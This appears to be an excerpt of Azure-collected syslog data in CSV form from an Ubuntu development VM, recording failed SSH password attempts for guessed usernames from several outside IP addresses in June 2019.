+12306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:29:29,UbuntuDevEnv,2019-06-26 03:29:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,113882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:29:31,UbuntuDevEnv,2019-06-26 03:29:31,auth,UbuntuDevEnv,info,Failed password for invalid user nicholas from 43.242.215.70 port 63406 ssh2,113882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,43.242.215.7,63406,,
+12308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:29:31,UbuntuDevEnv,2019-06-26 03:29:31,auth,UbuntuDevEnv,info,Disconnected from invalid user nicholas 43.242.215.70 port 63406 [preauth],113882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,43.242.215.7,63406,,
+12309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:29:31,UbuntuDevEnv,2019-06-26 03:29:31,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 63406:11: Bye Bye [preauth],113882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,63406,,
+12310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:31:26,UbuntuDevEnv,2019-06-26 03:31:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70  user=test,114384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,43.242.215.7,,0,
+12311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:31:28,UbuntuDevEnv,2019-06-26 03:31:27,auth,UbuntuDevEnv,info,Failed password for test from 43.242.215.70 port 26029 ssh2,114384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,26029,,
+12312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:31:28,UbuntuDevEnv,2019-06-26 03:31:28,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 43.242.215.70 port 26029 [preauth],114384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,43.242.215.7,26029,,
+12313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:31:28,UbuntuDevEnv,2019-06-26 03:31:28,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 26029:11: Bye Bye [preauth],114384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,26029,,
+12314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:32:41,UbuntuDevEnv,2019-06-26 03:32:41,auth,UbuntuDevEnv,info,Invalid user toor from 27.150.169.223 port 33515,114631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toor,27.150.169.2,33515,,
+12315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:32:41,UbuntuDevEnv,2019-06-26 03:32:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.150.169.223,114631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.150.169.2,,0,
+12316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:32:41,UbuntuDevEnv,2019-06-26 03:32:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,114631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:32:43,UbuntuDevEnv,2019-06-26 03:32:43,auth,UbuntuDevEnv,info,Failed password for invalid user toor from 27.150.169.223 port 33515 ssh2,114631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toor,27.150.169.2,33515,,
+12318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:32:47,UbuntuDevEnv,2019-06-26 03:32:47,auth,UbuntuDevEnv,info,Received disconnect from 27.150.169.223 port 33515:11: Bye Bye [preauth],114631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.150.169.2,33515,,
+12319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:32:47,UbuntuDevEnv,2019-06-26 03:32:47,auth,UbuntuDevEnv,info,Disconnected from invalid user toor 27.150.169.223 port 33515 [preauth],114631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toor,27.150.169.2,33515,,
+12320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:33:26,UbuntuDevEnv,2019-06-26 03:33:26,auth,UbuntuDevEnv,info,Invalid user enzyme from 43.242.215.70 port 6033,114814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,enzyme,43.242.215.7,6033,,
+12321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:33:26,UbuntuDevEnv,2019-06-26 03:33:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,114814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:33:26,UbuntuDevEnv,2019-06-26 03:33:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,114814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:33:28,UbuntuDevEnv,2019-06-26 03:33:28,auth,UbuntuDevEnv,info,Failed password for invalid user enzyme from 43.242.215.70 port 6033 ssh2,114814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,enzyme,43.242.215.7,6033,,
+12324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:33:28,UbuntuDevEnv,2019-06-26 03:33:28,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 6033:11: Bye Bye [preauth],114814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,6033,,
+12325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:33:28,UbuntuDevEnv,2019-06-26 03:33:28,auth,UbuntuDevEnv,info,Disconnected from invalid user enzyme 43.242.215.70 port 6033 [preauth],114814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,enzyme,43.242.215.7,6033,,
+12326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:34:39,UbuntuDevEnv,2019-06-26 03:34:38,auth,UbuntuDevEnv,info,Invalid user guohui from 106.13.4.172 port 33364,115064,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guohui,106.13.4.1,33364,,
+12327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:34:39,UbuntuDevEnv,2019-06-26 03:34:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,115064,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:34:39,UbuntuDevEnv,2019-06-26 03:34:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115064,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:34:41,UbuntuDevEnv,2019-06-26 03:34:40,auth,UbuntuDevEnv,info,Failed password for invalid user guohui from 106.13.4.172 port 33364 ssh2,115064,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guohui,106.13.4.1,33364,,
+12330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:34:41,UbuntuDevEnv,2019-06-26 03:34:40,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 33364:11: Bye Bye [preauth],115064,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,33364,,
+12331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:34:41,UbuntuDevEnv,2019-06-26 03:34:40,auth,UbuntuDevEnv,info,Disconnected from invalid user guohui 106.13.4.172 port 33364 [preauth],115064,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guohui,106.13.4.1,33364,,
+12332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:25,UbuntuDevEnv,2019-06-26 03:35:24,auth,UbuntuDevEnv,info,Invalid user virginie from 118.24.131.236 port 56382,115235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,virginie,118.24.131.2,56382,,
+12333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:25,UbuntuDevEnv,2019-06-26 03:35:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,115235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:25,UbuntuDevEnv,2019-06-26 03:35:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:25,UbuntuDevEnv,2019-06-26 03:35:25,auth,UbuntuDevEnv,info,Invalid user alex from 43.242.215.70 port 16603,115240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,43.242.215.7,16603,,
+12336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:25,UbuntuDevEnv,2019-06-26 03:35:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:25,UbuntuDevEnv,2019-06-26 03:35:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,115240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:26,UbuntuDevEnv,2019-06-26 03:35:26,auth,UbuntuDevEnv,info,Failed password for invalid user virginie from 118.24.131.236 port 56382 ssh2,115235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,virginie,118.24.131.2,56382,,
+12339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:27,UbuntuDevEnv,2019-06-26 03:35:26,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 56382:11: Bye Bye [preauth],115235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,56382,,
+12340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:27,UbuntuDevEnv,2019-06-26 03:35:26,auth,UbuntuDevEnv,info,Disconnected from invalid user virginie 118.24.131.236 port 56382 [preauth],115235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,virginie,118.24.131.2,56382,,
+12341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:28,UbuntuDevEnv,2019-06-26 03:35:27,auth,UbuntuDevEnv,info,Failed password for invalid user alex from 43.242.215.70 port 16603 ssh2,115240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,43.242.215.7,16603,,
+12342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:28,UbuntuDevEnv,2019-06-26 03:35:27,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 16603:11: Bye Bye [preauth],115240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,16603,,
+12343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:28,UbuntuDevEnv,2019-06-26 03:35:27,auth,UbuntuDevEnv,info,Disconnected from invalid user alex 43.242.215.70 port 16603 [preauth],115240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,43.242.215.7,16603,,
+12344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:35:30,UbuntuDevEnv,2019-06-26 03:35:30,auth,UbuntuDevEnv,info,Connection reset by 118.24.131.236 port 43666 [preauth],114843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,43666,,
+42424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:37:01,UbuntuDevEnv,2019-06-26 03:37:00,auth,UbuntuDevEnv,info,Connection closed by 118.24.131.236 port 40840 [preauth],115569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,40840,,
+12346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:37:23,UbuntuDevEnv,2019-06-26 03:37:23,auth,UbuntuDevEnv,info,Invalid user backup17 from 43.242.215.70 port 23331,115660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup17,43.242.215.7,23331,,
+12347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:37:23,UbuntuDevEnv,2019-06-26 03:37:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:37:23,UbuntuDevEnv,2019-06-26 03:37:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,115660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:37:25,UbuntuDevEnv,2019-06-26 03:37:25,auth,UbuntuDevEnv,info,Failed password for invalid user backup17 from 43.242.215.70 port 23331 ssh2,115660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup17,43.242.215.7,23331,,
+12350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:37:25,UbuntuDevEnv,2019-06-26 03:37:25,auth,UbuntuDevEnv,info,Disconnected from invalid user backup17 43.242.215.70 port 23331 [preauth],115660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup17,43.242.215.7,23331,,
+12351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:37:25,UbuntuDevEnv,2019-06-26 03:37:25,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 23331:11: Bye Bye [preauth],115660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,23331,,
+12352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:38:31,UbuntuDevEnv,2019-06-26 03:38:30,auth,UbuntuDevEnv,info,Invalid user yoshitaka from 118.24.131.236 port 53536,115901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yoshitaka,118.24.131.2,53536,,
+12353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:38:31,UbuntuDevEnv,2019-06-26 03:38:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:38:31,UbuntuDevEnv,2019-06-26 03:38:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,115901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:38:32,UbuntuDevEnv,2019-06-26 03:38:32,auth,UbuntuDevEnv,info,Failed password for invalid user yoshitaka from 118.24.131.236 port 53536 ssh2,115901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yoshitaka,118.24.131.2,53536,,
+12356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:38:33,UbuntuDevEnv,2019-06-26 03:38:32,auth,UbuntuDevEnv,info,Disconnected from invalid user yoshitaka 118.24.131.236 port 53536 [preauth],115901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yoshitaka,118.24.131.2,53536,,
+12357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:38:33,UbuntuDevEnv,2019-06-26 03:38:32,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 53536:11: Bye Bye [preauth],115901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,53536,,
+12358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:21,UbuntuDevEnv,2019-06-26 03:39:20,auth,UbuntuDevEnv,info,Invalid user stanchion from 43.242.215.70 port 50858,116081,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stanchion,43.242.215.7,50858,,
+12359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:21,UbuntuDevEnv,2019-06-26 03:39:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,116081,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:21,UbuntuDevEnv,2019-06-26 03:39:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116081,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:23,UbuntuDevEnv,2019-06-26 03:39:23,auth,UbuntuDevEnv,info,Failed password for invalid user stanchion from 43.242.215.70 port 50858 ssh2,116081,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stanchion,43.242.215.7,50858,,
+12362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:23,UbuntuDevEnv,2019-06-26 03:39:23,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 50858:11: Bye Bye [preauth],116081,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,50858,,
+12363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:23,UbuntuDevEnv,2019-06-26 03:39:23,auth,UbuntuDevEnv,info,Disconnected from invalid user stanchion 43.242.215.70 port 50858 [preauth],116081,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stanchion,43.242.215.7,50858,,
+12364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:35,UbuntuDevEnv,2019-06-26 03:39:34,auth,UbuntuDevEnv,info,Invalid user admin from 45.122.222.193 port 51539,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:35,UbuntuDevEnv,2019-06-26 03:39:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
